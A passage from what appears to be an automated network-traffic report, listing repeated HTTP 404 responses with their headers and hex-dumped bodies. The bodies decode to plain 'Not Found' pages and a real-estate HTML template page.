20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 31 30 31 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 34 37 34 37 34 37 3b 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 35 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 30 20 72
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1238date: Wed, 25 Sep 2024 07:17:01 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 31 30 31 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 34 37 34 37 34 37 3b 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 35 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 30 20 72
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1238date: Wed, 25 Sep 2024 07:17:04 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 31 30 31 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 34 37 34 37 34 37 3b 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 35 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 30 20 72
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Sep 2024 07:17:10 GMTServer: ApacheX-Frame-Options: SAMEORIGINContent-Length: 13928X-XSS-Protection: 1; mode=blockConnection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 4d 61 6b 61 61 6e 20 2d 20 52 65 61 6c 20 45 73 74 61 74 65 20 48 54 4d 4c 20 54 65 6d 70 6c 61 74 65 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 22 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 22 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3e 0d 0a 0d 0a 20 20 20 20 3c 21 2d 2d 20 46 61 76 69 63 6f 6e 20 2d 2d 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 69 6d 67 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 20 72 65 6c 3d 22 69 63 6f 6e 22 3e 0d 0a 0d 0a 20 20 20 20 3c 21 2d 2d 20 47 6f 6f 67 6c 65 20 57 65 62 20 46 6f 6e 74 73 20 2d 2d 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 22 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 73 74 61 74 69 63 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 32 3f 66 61 6d 69 6c 79 3d 48 65 65 62 6f 3a 77 67 68 74 40 34 30 30 3b 35 30 30 3b 36 30 30 26 66 61 6d 69 6c 79 3d 49 6e 74 65 72 3a 77 67 68 74 40 37 30 30 3b 38 30 30 26 64 69 73 70 6c 61 79 3d 73 77 61 70 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 20 20 20 20 0d 0a 20 20 20 20 3c 21 2d 2d 20 49 63 6f 6e 20 46 6f 6e 74 20 53 74 79 6c 65 73 68 65 65 74 20 2d 2d 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 66 6f 6e 74 2d 61 77 65 73 6f 6d 65 2f 35 2e 31 30 2e 30 2f 63 73 73 2f 61 6c 6c 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 6a 73 64 65 6c 69 76 72 2e 6e 65 74 2f 6e 70 6d 2f 62 6f 6f 74 73 74 72 61 70 2d 69 63 6f 6e 73 40 31 2e 34 2e 31 2f 66 6f 6e 74 2f 62 6f 6f 74 73 74 72 61 70 2d 69 63 6f 6e 73 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Sep 2024 07:17:12 GMTServer: ApacheX-Frame-Options: SAMEORIGINContent-Length: 13928X-XSS-Protection: 1; mode=blockConnection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 4d 61 6b 61 61 6e 20 2d 20 52 65 61 6c 20 45 73 74 61 74 65 20 48 54 4d 4c 20 54 65 6d 70 6c 61 74 65 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 22 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 22 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3e 0d 0a 0d 0a 20 20 20 20 3c 21 2d 2d 20 46 61 76 69 63 6f 6e 20 2d 2d 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 69 6d 67 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 20 72 65 6c 3d 22 69 63 6f 6e 22 3e 0d 0a 0d 0a 20 20 20 20 3c 21 2d 2d 20 47 6f 6f 67 6c 65 20 57 65 62 20 46 6f 6e 74 73 20 2d 2d 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 22 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 73 74 61 74 69 63 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 32 3f 66 61 6d 69 6c 79 3d 48 65 65 62 6f 3a 77 67 68 74 40 34 30 30 3b 35 30 30 3b 36 30 30 26 66 61 6d 69 6c 79 3d 49 6e 74 65 72 3a 77 67 68 74 40 37 30 30 3b 38 30 30 26 64 69 73 70 6c 61 79 3d 73 77 61 70 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 20 20 20 20 0d 0a 20 20 20 20 3c 21 2d 2d 20 49 63 6f 6e 20 46 6f 6e 74 20 53 74 79 6c 65 73 68 65 65 74 20 2d 2d 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 66 6f 6e 74 2d 61 77 65 73 6f 6d 65 2f 35 2e 31 30 2e 30 2f 63 73 73 2f 61 6c 6c 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 6a 73 64 65 6c 69 76 72 2e 6e 65 74 2f 6e 70 6d 2f 62 6f 6f 74 73 74 72 61 70 2d 69 63 6f 6e 73 40 31 2e 34 2e 31 2f 66 6f 6e 74 2f 62 6f 6f 74 73 74 72 61 70 2d 69 63 6f 6e 73 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Sep 2024 07:17:15 GMTServer: ApacheX-Frame-Options: SAMEORIGINContent-Length: 13928X-XSS-Protection: 1; mode=blockConnection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 4d 61 6b 61 61 6e 20 2d 20 52 65 61 6c 20 45 73 74 61 74 65 20 48 54 4d 4c 20 54 65 6d 70 6c 61 74 65 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 22 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 22 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3e 0d 0a 0d 0a 20 20 20 20 3c 21 2d 2d 20 46 61 76 69 63 6f 6e 20 2d 2d 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 69 6d 67 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 20 72 65 6c 3d 22 69 63 6f 6e 22 3e 0d 0a 0d 0a 20 20 20 20 3c 21 2d 2d 20 47 6f 6f 67 6c 65 20 57 65 62 20 46 6f 6e 74 73 20 2d 2d 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 22 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 73 74 61 74 69 63 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 32 3f 66 61 6d 69 6c 79 3d 48 65 65 62 6f 3a 77 67 68 74 40 34 30 30 3b 35 30 30 3b 36 30 30 26 66 61 6d 69 6c 79 3d 49 6e 74 65 72 3a 77 67 68 74 40 37 30 30 3b 38 30 30 26 64 69 73 70 6c 61 79 3d 73 77 61 70 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 20 20 20 20 0d 0a 20 20 20 20 3c 21 2d 2d 20 49 63 6f 6e 20 46 6f 6e 74 20 53 74 79 6c 65 73 68 65 65 74 20 2d 2d 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 66 6f 6e 74 2d 61 77 65 73 6f 6d 65 2f 35 2e 31 30 2e 30 2f 63 73 73 2f 61 6c 6c 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 6a 73 64 65 6c 69 76 72 2e 6e 65 74 2f 6e 70 6d 2f 62 6f 6f 74 73 74 72 61 70 2d 69 63 6f 6e 73 40 31 2e 34 2e 31 2f 66 6f 6e 74 2f 62 6f 6f 74 73 74 72 61 70 2d 69 63 6f 6e 73 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Sep 2024 07:17:17 GMTServer: ApacheX-Frame-Options: SAMEORIGINContent-Length: 13928X-XSS-Protection: 1; mode=blockConnection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 4d 61 6b 61 61 6e 20 2d 20 52 65 61 6c 20 45 73 74 61 74 65 20 48 54 4d 4c 20 54 65 6d 70 6c 61 74 65 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 22 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 22 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3e 0d 0a 0d 0a 20 20 20 20 3c 21 2d 2d 20 46 61 76 69 63 6f 6e 20 2d 2d 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 69 6d 67 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 20 72 65 6c 3d 22 69 63 6f 6e 22 3e 0d 0a 0d 0a 20 20 20 20 3c 21 2d 2d 20 47 6f 6f 67 6c 65 20 57 65 62 20 46 6f 6e 74 73 20 2d 2d 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 22 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 73 74 61 74 69 63 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 32 3f 66 61 6d 69 6c 79 3d 48 65 65 62 6f 3a 77 67 68 74 40 34 30 30 3b 35 30 30 3b 36 30 30 26 66 61 6d 69 6c 79 3d 49 6e 74 65 72 3a 77 67 68 74 40 37 30 30 3b 38 30 30 26 64 69 73 70 6c 61 79 3d 73 77 61 70 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 20 20 20 20 0d 0a 20 20 20 20 3c 21 2d 2d 20 49 63 6f 6e 20 46 6f 6e 74 20 53 74 79 6c 65 73 68 65 65 74 20 2d 2d 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 66 6f 6e 74 2d 61 77 65 73 6f 6d 65 2f 35 2e 31 30 2e 30 2f 63 73 73 2f 61 6c 6c 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 6a 73 64 65 6c 69 76 72 2e 6e 65 74 2f 6e 70 6d 2f 62 6f 6f 74 73 74 72 61 